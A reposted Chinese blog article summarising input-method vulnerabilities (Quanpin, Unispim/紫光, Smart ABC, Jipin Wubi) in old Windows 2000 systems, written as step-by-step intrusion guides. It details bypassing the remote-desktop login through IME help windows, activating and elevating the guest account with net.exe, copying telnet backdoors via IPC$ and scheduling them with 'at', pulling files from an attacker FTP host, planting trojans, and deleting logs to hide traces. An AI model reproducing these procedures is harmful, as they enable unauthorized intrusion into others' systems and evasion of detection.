输入法漏洞总结篇

简介:
输入法漏洞是一个很经典的漏洞,相信大家以前零零散散都玩过
本人总结了下出现了的几个输入法漏洞
再配合以前一些经典入侵的事例
希望对大家有所帮助,或许在入侵过程中有用呢
说明:本人只是做个总结,以上引用了不少大侠的文章

<<全拼输入法漏洞入侵>>
一,获得管理员账号:
   我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入

到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发
现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登
录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)
。用右键点击状态条上的微软徽标,弹出"帮助"(如果发现"帮助"呈灰色,放弃,因为对方很可能发
现并已经补上了这个漏洞),打开"帮助"一栏中"操作指南",在最上面的任务栏点击右键,会弹出一
个菜单,打开"跳至URL"。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,
该系统安装在C盘上,就在空白栏中填入"c:winntsystem32"。然后按"确定",于是我们就成功地绕过
了身份验证,进入了系统的SYSTEM32目录。
  现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个
快捷方式,右键点击该快捷方式,在"属性"-;"目标"-;c:winntsystem32 et.exe后面空一格,填入
"user guest /active :yes"点"确定"。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当
然也可以利用"user 用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此
时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user guest 密码",运行
,于是guest便有了密码。最后,再次修改,填入"localgroup administrators guest /add,将guest变
成系统管理员。
二,创建跳板:
  再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开
"控制面板",进入"网络和拔号连接",在"本地连接"或"拔号连接"中查看属性,看对方是否选择
"Microsoft 网络的文件和打印机共享",如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号
网络共享才会打开。
  退出对方系统,在本地机命令提示符下,输入net use \\\\IP AddressIPC$ ["password"] 
/user:"guset",通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有
ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。
   copy c:hacksrv.exe \\\\***.***.***.***admin$然后利用定时服务启动它,先了解对方的时间:net 
time \\\\***.***.***.***
显示:\\\\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 命令成功完成。然后启动srv.exe:at 
\\\\***.***.***.*** 09:00 srv.exe 
显示:新加了一项作业,其作业 ID = 0过几分钟后,telnet ***.***.***.*** 99 这里不需要验证身份
,直接登录,显示:c:winnt:system32
我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:copy c:hack tlm.exe 
\\\\211.21.193.202admin$
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe
C:WINNTsystem32;ntlm
显示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. 
Done!
C:WINNTsystem32;
C:WINNTsystem32;
好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务:net stop telnet 系统告
诉你并没有启动telnet,不理它,继续:net start telnet 这次娴钠舳藅elnet,我们可以在另开的
命令提示符窗口telnet到对方的23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的
跳板了。我们可以利用它到其它的主机去。
三、扫除脚印:
删除为net.exe 创建的快捷方式,删除winntsystem32logfiles下边的日志文件
补漏方法:
1、打补丁
2、删除输入法帮助文件
3、停止终端服务。

<<利用"紫光拼音输入法"漏洞入侵>>
      按下了shift+ctrl(切换输入法)紫光拼音的输入法!再用右键一点,帮助出来了。
轻车熟路的点击帮助里的"打印",选择"打印选定主题",双击"添加打印机",弹出向导,点击"下

一步"  
选择"网络打印机",next,选"连接到internet或......",随便填上"2313123",next,出错提示,嘿

嘿,点击"帮助",哈哈,"web帮助",唉?我亲爱的"打开url"选项哪里去了???????  
看来补丁真的很有效,只有在internet选项上打主意了。  
回到输入法的帮助窗口,点击选项里的"internet选项",看看......  
改主页什么设置很没意思,IE的安全性也帮不上什么忙,再找找,嘿,有了!  
在"隐私"项里有"导入"的功能(或者在"常规"项的"辅助功能"里的"使用样式表编排文档格式"

的"浏览")按钮,点击后就出来一个"打开"窗口,文件类型选择成"所有文件",这时候我们就有了

硬盘的system权限啦,可以删除、改名文件,设置共享、web共享。哈哈哈......嗯,别忙着得意,浏览器

还是出不来,我们也就无法进入控制面板、管理工具,最可恨的是我们没有打开文件的权限!虽然有恶作

剧式的删除所有文件的权限,但是我们的目标是......没有蛀牙~靠!多隆,关门,放狗!应该是admin组

的权限嘛。  
我们首先要做到的是目标机器和本地机器文件的传输,做到这一点,就可以从容的修改文件了,不能远程

打开就本地打开嘛,是不?上传下载文件有两种方法,一是利用已有权限设置共享目录(当然是everyone

权限的),二是利用FTP。前一种方法容易受到防火墙的限制,所以我用的是第二种方法。  
什么?对方没开FTP?我靠,你不会开啊!我的OS是win2k server,很容易开了一个ftp服务,当然是匿名

登陆的,任何人登陆都可以有读写的权限。这样就可以在"打开"窗口里的文件名一栏填入  
[url]FTP://222.222.222.222[/url] (222.222.222.222是我的IP)  
来进入我的FTP目录了,需要注意的是,如果当前目录是C:\\\\,就会提示找不到路径  
"C:\\\\ [url]FTP://222.222.222.222[/url]"
;;  
所以,我们要先选择到"我的电脑",在敲入FTP地址,就不会出现这样的问题了  
然后就可以在"打开"窗口里像操作远程目录一样操作我的FTP目录了,使用复制、粘贴功能上传、下载

文件。  
现在我们已经可以做到修改任意没有被服务锁定的文件啦!也就是说,这个网站已经基本上在我们的掌握

之中了,修改其主页轻而易举,甚至可以使用"web共享"功能建立自己的新站。  
接下来我就第一时间通知了该站的网管,删除紫光的*.CHM帮助文件修补漏洞。  
当然,为了获得进一步权限,我们还可以往里面放木马(最好是先下载远程的比较常用的可执行文件,然

后和木马捆绑起来再上传回去。)不推荐冰河等木马,因为会轻易被防火墙捕捉到,最好是一些自动打开

telnet服务、自动添加admin组帐号等工具。  
等到对方中了标,不明不白的开了telnet服务后,我们就有了system的shell,就可以添加admin组的帐号

了,添加过程可以参看我前面写的教程或其他相关教程。有了admin组帐号怎么办?我晕,你可以用来砸

人~~~~呵呵^_^ 别忘了相关日志要kill~~  
事情完结后,不禁又是一番感慨,本来这个网站是没有输入法漏洞的,大概是打全了补丁,管理员就有些

大意,装了新的输入法也没有想到会不会有新的漏洞出现。  
紫光拼音确实是一个很好的输入法,我也很喜欢,没想到却带来这么大的隐患,可见网络安全的脆弱性,

作为管理员,真是一丝也不可大意啊...! 

<<智能ABC输入法的两个漏洞>>

漏洞一 : 
         这个漏洞很老了,估计大家都知道了        
         它两年以前就出来了,我还是将它一起写出来吧。
        首先,切换到智能ABC输入法状态,依次输入"V","←""DEL""Enter"
         就会出现错误窗口并强迫关闭当前窗口。
        这个漏洞出来后,有很多人将它用到免费上网上去,的确那时的网吧管理软件
        的处理能力很差,很容易中招,不过现在这个的网吧管理软件基本已经补好这个漏洞了。
漏洞二.这个漏洞是我以前发现的,一直没有公布。它和第一个一样也是"V"扰的祸,
       只不过方法有些不同而已。
        首先还是切换ABC输入法状态输入>=2个任何字母(其中首尾两个字母不是"v"),然后
再利用退格键将光标拉倒第一个字母后(其实只要不是在一个字母后最后一个字母后就行),
再输入"v",然后再将输入的"V"前的字母删掉,再按2次空格键就会出现和漏洞一
一样的错误窗口,当然有时按2次没有出现时就多按几次,直到错误窗口出来为止。



<<极品五笔输入法漏洞>>
             极品五笔也可以调出帮助菜单( 经典的漏洞,后面大家都知道怎么做了,不重复了)
             现在好象只有5.0版本的没有这个漏洞 ,其它版本都存在漏洞

             这个漏洞只在本地有用,远程连接调不出来




















本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8552 ,如需转载请自行联系原作者


相关文章
|
11月前
|
安全 Shell 数据安全/隐私保护
测试免杀过卡巴斯基和window defender
测试免杀过卡巴斯基和window defender
|
安全 程序员 数据安全/隐私保护
|
API C# C++
VISTA 与输入法程式介面
原文:VISTA 与输入法程式介面 VISTA 与输入法程式介面       文/黄忠成      近日,我所兼职顾问的公司开始将旧有的Win32 程式及新开发的.NET 应用程式移转到VISTA 系统上测试,由于我们的应用程式多半是商用套装软体, 相当然尔对于以程式切换输入法的...
1095 0
|
安全 数据安全/隐私保护
WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权
前言     发现这个漏洞的时候, 笔者正在机房上课。正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑。 没想到就随手扫描到一台WIN8的系统,而且这个系统还装了QQ输入法WIN8纯净版。
1117 0
|
Go 数据安全/隐私保护 Windows